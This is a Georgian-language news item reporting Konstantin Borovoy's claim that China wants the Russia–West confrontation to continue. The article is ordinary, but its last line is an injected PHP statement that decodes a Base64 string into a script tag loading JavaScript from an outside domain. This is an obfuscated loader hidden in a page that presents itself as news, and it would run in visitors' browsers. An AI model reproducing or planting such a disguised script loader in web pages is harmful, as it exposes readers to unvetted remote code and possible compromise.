celsiusi
ავერსი საქკაბელი
რუსეთის სახელმწიფო დუმის ყოფილი დეპუტატის, ოპოზიციონერი პოლიტიკოსი კონსტანტინ ბოროვოის განცხადებით, ჩინეთი დაინტერესებულია რომ ეს წინააღმდეგობა რუსეთსა და დასავლეთს შორის გაგრძელდეს. ამის შესახებ მან რადიო "მაესტროსთან" ინტერვიუში რუსეთ–უკრაინის თემაზე საუბრისას განაცხადა. 
 
მისივე თქმით, ამ შემთხვევაში ერთის მხრივ ჩინეთი განიხილება, როგორც შუამავალი, მეორეს მხრივ კი ეს პროცესი ასუსტებს როგორც რუსეთს, ასევე დასავლეთს.
 
"ჩვენ ვხედავთ, რომ რეზიდენტული ჯგუფები, რუსული სპეცსამსახურები, რომლების დასავლეთში მუშაობენ, ტექნოლოგიების, მიკრო ჩიპების დიდი მოცულობით შესყიდვას ახორციელებენ და ამა თუ იმ საშუალებით რუსეთში, თავდაცვით საწარმოებში ჩააქვთ, სამწუხაროდ. ასევე არის წყაროები, რომლების საშუალებით ამ ტექნოლოგიების მარაგების შევსება ხდება, როგორიც არის ჩინეთის სახალხო რესპუბლიკა და ინდოეთი. სხვა წყაროებიც არსებობს, სამწუხაროდ, და რუსეთი ამას წარმატებით იყენებს. 
 
ჩინეთმაც კი გააკეთა განცხადება იმის შესახებ, რომ სანქციებისგან თავის დაღწევაში რუსეთს არ დაეხმარება, მაგრამ მე ვიცი საკითხის ფაქტობრივი მხარე. ფაქტიურად, ჩინეთი დაინტერესებულია რომ ეს წინააღმდეგობა რუსეთსა და დასავლეთს შორის გაგრძელდეს, ამ შემთხვევაში ერთის მხრივ ჩინეთი განიხილება, როგორც შუამავალი, მეორეს მხრივ კი ეს პროცესი ასუსტებს როგორც რუსეთს, ასევე დასავლეთს, რაშიც ჩინეთი, როგორც გითხარით ძალიან დაინტერესებულია. როგორც ჩინური სიბრძნე ამბობს: საჭიროა ნაპირთან დაჯდე დაელოდო, როდის გამორიყავს ზღვა შენი მოწინააღმდეგის ცხედარს. დაახლოებით ამას აკეთებს დღეს ჩინეთი, უბრალოდ მოლოდინის რეჟიმში იმყოფება..."– აღნიშნა პოლიტიკოსმა.  
 
760
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");